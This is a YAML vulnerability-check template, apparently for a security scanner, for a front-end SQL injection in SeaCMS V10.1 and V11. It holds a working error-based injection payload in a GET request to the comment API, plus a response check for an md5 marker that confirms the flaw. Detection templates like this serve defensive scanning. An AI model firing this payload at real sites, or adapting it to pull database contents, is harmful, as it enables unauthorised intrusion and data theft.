product: SeaCMS(海洋CMS)
vName: 海洋cmsV10.1&V11前台sql注入漏洞
type: SQL注入
vID: [ ]
level: 3
vDesc: 海洋CMS V10.1&V11前台SQL注入漏洞，可以获取数据库信息。
version: ''
note: ''
search: { }
protocol: http
link: https://cloud.tencent.com/developer/article/1708091
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: true
      path: /comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 6f7c6dcbc380aac3bcba1f9fccec99
            logic: and